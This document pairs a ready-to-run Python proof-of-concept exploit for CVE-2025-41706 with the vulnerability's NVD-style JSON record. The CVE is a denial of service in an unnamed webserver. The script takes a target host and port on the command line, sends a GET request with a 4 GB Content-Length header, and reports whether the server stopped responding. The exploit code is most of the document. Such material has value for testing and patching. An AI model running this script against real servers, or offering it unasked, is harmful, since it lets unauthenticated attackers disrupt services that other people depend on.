CVE-2025-41706

#!/usr/bin/env python3 # CVE-2025-41706 PoC - Web Server Denial of Service via Over-long Content-Length in GET Request # This PoC demonstrates a DoS attack against the vulnerable webserver # by sending a GET request with an abnormally large Content-Length header value. import socket import sys import argparse def exploit(target_host, target_port=80, content_length=4294967296, timeout=10): """ Send a malicious GET request with an over-long Content-Length header to trigger the denial of service condition. Args: target_host: Target webserver IP address or hostname target_port: Target webserver port (default: 80) content_length: Abnormally large Content-Length value (default: 4GB) timeout: Connection timeout in seconds """ try: # Create TCP socket connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((target_host, target_port)) # Construct malicious HTTP GET request with over-long Content-Length # The GET method normally should not contain a body or Content-Length payload = ( f"GET / HTTP/1.1\r\n" f"Host: {target_host}\r\n" f"Content-Length: {content_length}\r\n" f"Connection: close\r\n" f"\r\n" ) print(f"[*] Connecting to {target_host}:{target_port}") print(f"[*] Sending malicious GET request with Content-Length: {content_length}") # Send the crafted payload sock.send(payload.encode()) print("[+] Payload sent successfully!") print("[!] The target webserver may become unresponsive.") # Attempt to receive response (may hang or timeout if DoS successful) try: response = sock.recv(4096) print(f"[*] Received response: {response[:100]}") except socket.timeout: print("[!] Connection timed out - possible DoS condition triggered") sock.close() return True except socket.error as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-41706 DoS PoC') parser.add_argument('target', help='Target webserver IP or hostname') parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)') parser.add_argument('-l', '--length', type=int, default=4294967296, help='Content-Length value (default: 4GB)') parser.add_argument('-t', '--timeout', type=int, default=10, help='Connection timeout (default: 10s)') args = parser.parse_args() exploit(args.target, args.port, args.length, args.timeout)

{"cve": {"id": "CVE-2025-41706", "sourceIdentifier": "[email protected]", "published": "2025-10-14T08:15:35.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The webserver is vulnerable to a denial of service condition. An unauthenticated remote attacker can craft a special GET request with an over-long content-length to trigger the issue without affecting the core functionality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-072", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/12", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}